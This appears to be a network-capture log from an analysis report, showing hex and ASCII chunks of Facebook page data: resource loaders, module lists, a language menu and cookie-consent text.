2022-10-07 13:59:49 UTC	1108	IN	Data Raw: 5c 2f 79 71 5c 2f 72 5c 2f 68 6b 49 4b 57 6f 71 64 68 69 4c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 73 32 78 69 74 32 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4e 4f 56 34 5c 2f 79 57 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 50 39 45 4a 42 5f 5f 62 79 59 47 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 69 4e 52 54 6c 6e 71 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 Data Ascii: \/yq\/r\/hkIKWoqdhiL.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"s2xit2v":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iNOV4\/yW\/l\/en_US\/P9EJB__byYG.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"iNRTlnq":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.p
2022-10-07 13:59:49 UTC	1109	IN	Data Raw: 2c 22 6e 63 22 3a 31 7d 2c 22 4d 30 4c 31 44 6f 61 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 63 51 74 34 5c 2f 79 6d 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 41 43 74 7a 4f 4d 6a 6b 72 62 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6a 6a 32 39 55 5a 42 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 64 5c 2f 72 5c 2f 30 4f 58 63 78 4b 6d 35 69 42 75 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c Data Ascii: ,"nc":1},"M0L1Doa":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3icQt4\/ym\/l\/en_US\/ACtzOMjkrbl.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"jj29UZB":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/r\/0OXcxKm5iBu.js?_nc_x=Ij3Wp8l
2022-10-07 13:59:49 UTC	1110	IN	Data Raw: 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 34 6c 72 34 5c 2f 79 74 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 53 76 5f 4c 73 46 45 65 52 47 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 68 5c 2f 72 5c 2f 39 31 5a 56 4b 55 50 54 71 41 61 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 38 45 4c 43 42 77 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 Data Ascii: \/\/static.xx.fbcdn.net\/rsrc.php\/v3i4lr4\/yt\/l\/en_US\/Sv_LsFEeRG8.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/91ZVKUPTqAa.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"8ELCBwH":{"type":"js","src":"h
2022-10-07 13:59:49 UTC	1112	IN	Data Raw: 72 36 35 61 22 2c 22 4b 73 62 52 73 33 75 22 2c 22 78 32 6c 72 47 41 57 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 52 50 4c 48 38 6a 67 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 57 65 62 53 70 65 65 64 49 6e 74 65 72 61 63 74 69 6f 6e 73 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 70 51 5c 2f 69 66 58 75 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 42 49 79 6c 4b 43 34 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 3a 7b 22 72 22 3a 5b 22 6e 36 57 34 78 4d 48 22 2c 22 38 7a 62 45 5a 74 75 22 2c Data Ascii: r65a","KsbRs3u","x2lrGAW","vGt2mxz","lWOvGTa","BIylKC4","Fn3rAl7","RPLH8jg"],"be":1},"WebSpeedInteractionsTypedLogger":{"r":["pQ\/ifXu","8zbEZtu","hKY0QKT","BIylKC4"],"rds":{"m":["BanzaiScuba_DEPRECATED"]},"be":1},"AsyncRequest":{"r":["n6W4xMH","8zbEZtu",
2022-10-07 13:59:49 UTC	1113	IN	Data Raw: 5d 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 53 6e 6f 77 6c 69 66 74 22 3a 7b 22 72 22 3a 5b 22 62 4b 43 6c 54 67 56 22 2c 22 6c 47 30 6f 48 42 43 22 2c 22 62 39 4b 5a 49 48 4a 22 2c 22 71 31 6a 53 5a 38 63 22 2c 22 44 39 58 42 33 67 6a 22 2c 22 64 69 6f 67 56 61 75 22 2c 22 59 74 55 33 43 35 75 22 2c 22 68 49 77 41 32 57 36 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 53 79 48 76 61 66 68 22 2c 22 47 44 70 76 74 4b 33 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 6a 31 76 63 68 56 64 22 2c 22 50 64 39 56 6a 78 6c 22 2c 22 43 51 57 57 67 50 76 22 2c 22 7a 4b 5c 2f 52 45 55 56 22 2c 22 34 33 66 32 4c 2b 36 22 2c 22 64 48 73 4a 51 36 79 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 44 31 5c 2f 4a 54 6d 54 22 2c Data Ascii: ],"be":1},"PhotoSnowlift":{"r":["bKClTgV","lG0oHBC","b9KZIHJ","q1jSZ8c","D9XB3gj","diogVau","YtU3C5u","hIwA2W6","dAxX0jj","mRpDwmd","e9ANzw\/","SyHvafh","GDpvtK3","CGkH4FY","j1vchVd","Pd9Vjxl","CQWWgPv","zK\/REUV","43f2L+6","dHsJQ6y","srPmdt4","D1\/JTmT",
2022-10-07 13:59:49 UTC	1115	IN	Data Raw: 48 6f 72 22 2c 22 78 32 6c 72 47 41 57 22 2c 22 6f 56 57 38 65 54 58 22 2c 22 6b 4f 45 48 76 70 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 36 59 65 33 48 37 45 22 2c 22 59 30 65 38 68 30 41 22 2c 22 6b 53 39 54 42 76 4f 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6c 6c 34 5a 47 5c 2f 79 22 2c 22 4d 30 4c 31 44 6f 61 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 4f 4a 30 33 31 65 37 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 6a 6a 32 39 55 5a 42 22 2c 22 6e 41 47 52 49 34 69 22 2c 22 4c 38 59 63 49 6f 6e 22 2c 22 65 50 65 34 5a 52 36 22 2c 22 63 59 55 33 63 33 32 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 73 46 44 4a 68 68 77 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 68 63 36 4d 59 58 55 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 64 78 5c 2f 41 67 70 4f 22 5d 2c 22 72 64 73 22 3a 7b Data Ascii: Hor","x2lrGAW","oVW8eTX","kOEHvpu","vGt2mxz","6Ye3H7E","Y0e8h0A","kS9TBvO","lWOvGTa","ll4ZG\/y","M0L1Doa","h3ZzAmG","OJ031e7","BIylKC4","jj29UZB","nAGRI4i","L8YcIon","ePe4ZR6","cYU3c32","Fn3rAl7","sFDJhhw","RPLH8jg","hc6MYXU","07JSiP0","dx\/AgpO"],"rds":{
2022-10-07 13:59:49 UTC	1116	IN	Data Raw: 2c 22 58 53 61 6c 65 73 50 72 6f 6d 6f 57 57 57 44 65 74 61 69 6c 73 44 69 61 6c 6f 67 41 73 79 6e 63 43 6f 6e 74 72 6f 6c 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 67 57 4d 4a 67 54 65 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 4f 66 66 65 72 43 6f 6e 74 72 6f 6c 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 68 49 65 6b 2b 62 47 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 50 65 72 66 58 53 68 61 72 65 64 46 69 65 6c 64 73 22 3a 7b 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4f 44 53 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4b 65 79 45 76 65 6e 74 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 47 6a 38 76 39 Data Ascii: ,"XSalesPromoWWWDetailsDialogAsyncController":{"r":["gWMJgTe"],"be":1},"XOfferController":{"r":["hIek+bG"],"be":1},"PerfXSharedFields":{"r":["BIylKC4"],"be":1},"ODS":{"r":["8zbEZtu","hKY0QKT"],"be":1},"KeyEventTypedLogger":{"r":["8zbEZtu","hKY0QKT","Gj8v9
2022-10-07 13:59:49 UTC	1118	IN	Data Raw: 67 70 4f 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 51 4d 6d 34 47 43 6d 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 49 6e 6c 69 6e 65 54 61 62 4f 72 64 65 72 22 3a 7b 22 72 22 3a 5b 22 5a 35 4c 46 32 6a 31 22 2c 22 7a 50 4c 67 49 47 54 22 2c 22 51 4d 6d 34 47 43 6d 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 75 74 74 6f 6e 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 59 74 55 33 43 35 75 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 7a 4b 5c 2f 52 45 55 56 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 49 61 52 5c 2f 36 75 50 22 2c 22 51 Data Ascii: gpO","RPLH8jg","QMm4GCm"],"be":1},"ContextualLayerInlineTabOrder":{"r":["Z5LF2j1","zPLgIGT","QMm4GCm","8zbEZtu","vGt2mxz","lWOvGTa","BIylKC4","Fn3rAl7"],"be":1},"XUIDialogButton.react":{"r":["YtU3C5u","dAxX0jj","zK\/REUV","srPmdt4","R5w1rCJ","IaR\/6uP","Q
2022-10-07 13:59:49 UTC	1119	IN	Data Raw: 7d 7d 29 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 5d 2c 20 66 75 6e 63 74 69 6f 6e 28 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 29 20 7b 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 2e 6c 6f 61 64 4f 6e 44 4f 4d 43 6f 6e 74 65 6e 74 52 65 61 64 79 28 5b 22 42 49 79 6c 4b 43 34 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 63 59 55 33 63 33 32 22 2c 22 44 31 5c 2f 4a 54 6d 54 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 5c 2f 72 4f 30 6c 62 6e 22 2c 22 6c 57 4f 76 47 54 61 22 2c Data Ascii: }})});</script><script>requireLazy(["InitialJSLoader"], function(InitialJSLoader) {InitialJSLoader.loadOnDOMContentReady(["BIylKC4","8zbEZtu","vGt2mxz","hKY0QKT","mRpDwmd","n6W4xMH","h3ZzAmG","dAxX0jj","cYU3c32","D1\/JTmT","Z2GjVu9","\/rO0lbn","lWOvGTa",
2022-10-07 13:59:49 UTC	1121	IN	Data Raw: 73 22 3a 5b 22 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 22 2c 22 61 64 73 2d 65 6e 63 72 79 70 74 69 6f 6e 2d 75 72 6c 2d 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 61 64 2e 61 74 64 6d 74 2e 63 6f 6d 22 2c 22 61 64 66 6f 72 6d 2e 6e 65 74 22 2c 22 61 64 31 33 2e 61 64 66 61 72 6d 31 2e 61 64 69 74 69 6f 6e 2e 63 6f 6d 22 2c 22 69 6c 6f 76 65 6d 79 66 72 65 65 64 6f 6d 73 2e 63 6f 6d 22 2c 22 73 65 63 75 72 65 2e 61 64 6e 78 73 2e 63 6f 6d 22 5d 2c 22 69 73 5f 6d 6f 62 69 6c 65 5f 64 65 76 69 63 65 22 3a 66 61 6c 73 65 7d 2c 32 37 5d 5d 2c 22 69 6e 73 74 61 6e 63 65 73 22 3a 5b 5b 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 70 52 22 2c 5b 22 53 65 6c 65 63 74 61 Data Ascii: s":["ad.doubleclick.net","ads-encryption-url-example.com","bs.serving-sys.com","ad.atdmt.com","adform.net","ad13.adfarm1.adition.com","ilovemyfreedoms.com","secure.adnxs.com"],"is_mobile_device":false},27]],"instances":[["__inst_02182015_0_0_pR",["Selecta
2022-10-07 13:59:49 UTC	1122	IN	Data Raw: 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 71 45 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 44 61 6e 73 6b 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 64 65 5f 44 45 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 47 61 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 44 65 75 74 73 63 68 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 Data Ascii: "__m":"__markup_3310c079_0_1_qE"},"label":"Dansk","title":"","className":"headerItem"},{"class":"headerItem","value":"de_DE","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_2_Ga"},"label":"Deutsch","title":"","cla
2022-10-07 13:59:49 UTC	1124	IN	Data Raw: 48 55 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 65 2b 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 4d 61 67 79 61 72 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6e 6c 5f 4e 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a Data Ascii: HU","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_9_e+"},"label":"Magyar","title":"","className":"headerItem"},{"class":"headerItem","value":"nl_NL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":
2022-10-07 13:59:49 UTC	1125	IN	Data Raw: 69 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 73 76 5f 53 45 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 30 43 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 53 76 65 6e 73 6b 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 Data Ascii: i","title":"","className":"headerItem"},{"class":"headerItem","value":"sv_SE","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_h_0C"},"label":"Svenska","title":"","className":"headerItem"},{"class":"headerItem","va
2022-10-07 13:59:49 UTC	1127	IN	Data Raw: 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 61 72 5f 41 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 49 62 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36 33 31 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 39 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 Data Ascii: ,{"class":"headerItem","value":"ar_AR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_o_Ib"},"label":"\u0627\u0644\u0639\u0631\u0628\u064a\u0629","title":"","className":"headerItem"},{"class":"headerItem","value"
2022-10-07 13:59:49 UTC	1128	IN	Data Raw: 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6b 6f 5f 4b 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 76 5f 32 68 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 5d 2c 7b 22 69 64 22 3a 22 75 5f 30 5f 36 5f 67 57 22 2c 22 62 65 68 61 76 69 6f 72 73 22 3a 5b 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 57 69 74 68 53 71 75 61 72 65 Data Ascii: class":"headerItem","value":"ko_KR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_v_2h"},"label":"\ud55c\uad6d\uc5b4","title":"","className":"headerItem"}],{"id":"u_0_6_gW","behaviors":[{"__m":"XUIMenuWithSquare
2022-10-07 13:59:49 UTC	1129	IN	Data Raw: 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 41 75 74 6f 46 6c 69 70 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 44 69 61 6c 6f 67 41 72 72 6f 77 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 6f 73 69 74 69 6f 6e 43 6c 61 73 73 4f 6e 43 6f 6e 74 65 78 74 22 7d 5d 2c 7b 22 61 6c 69 67 6e 68 22 3a 22 6c 65 66 74 22 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 22 62 65 6c 6f 77 22 7d 5d 2c 32 5d 5d 2c 22 6d 61 72 6b 75 70 22 3a 5b 5b 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 50 4f 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 34 2d 69 32 20 5f 70 69 67 20 5f 39 6f 2d 63 20 5f 39 70 6c 6c 20 5f Data Ascii: _m":"ContextualLayerAutoFlip"},{"__m":"ContextualDialogArrow"},{"__m":"ContextualLayerPositionClassOnContext"}],{"alignh":"left","position":"below"}],2]],"markup":[["__markup_9f5fac15_0_0_PO",{"__html":"\u003Cdiv>\u003Cdiv class=\"_4-i2 _pig _9o-c _9pll _
2022-10-07 13:59:49 UTC	1131	IN	Data Raw: 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 32 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 32 61 30 33 66 61 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 34 5c 22 3e 50 72 6f 76 69 64 65 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 20 66 6f 72 20 70 65 6f 70 6c 65 20 77 68 6f 20 68 61 76 65 20 61 6e 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 Data Ascii: \u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo2\">\u003Ci class=\"img sp_2myvABqqKqq sx_2a03fa\">\u003C\/i>\u003Cdiv class=\"_9xo4\">Provide and improve Facebook Products for people who have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"
2022-10-07 13:59:49 UTC	1132	IN	Data Raw: 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 43 6f 6e 74 72 6f 6c 73 20 69 6e 20 79 6f 75 72 20 46 61 63 65 62 6f 6f 6b 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 35 38 66 32 65 31 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 Data Ascii: lass=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Controls in your Facebook account\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_2myvABqqKqq sx_58f2e1\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9
2022-10-07 13:59:49 UTC	1134	IN	Data Raw: 20 73 68 6f 77 20 79 6f 75 20 61 64 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 4f 66 66 2d 46 61 63 65 62 6f 6f 6b 20 61 63 74 69 76 69 74 79 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 72 65 76 69 65 77 20 79 6f 75 72 20 6f 66 66 2d 46 61 63 65 62 6f 6f 6b 20 61 63 74 69 76 69 74 79 2c 20 77 68 69 63 68 20 69 73 20 61 20 73 75 6d 6d 61 72 79 20 6f 66 20 61 63 74 69 76 69 74 79 20 74 68 61 74 20 62 75 73 69 6e 65 73 73 65 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 20 73 68 61 72 65 20 77 69 74 68 20 75 73 20 61 62 6f 75 74 20 79 6f 75 72 20 69 6e 74 65 72 61 63 74 69 6f 6e 73 20 77 69 74 68 20 74 Data Ascii: show you ads.\u003C\/p>\u003Cp class=\"_9si-\">Off-Facebook 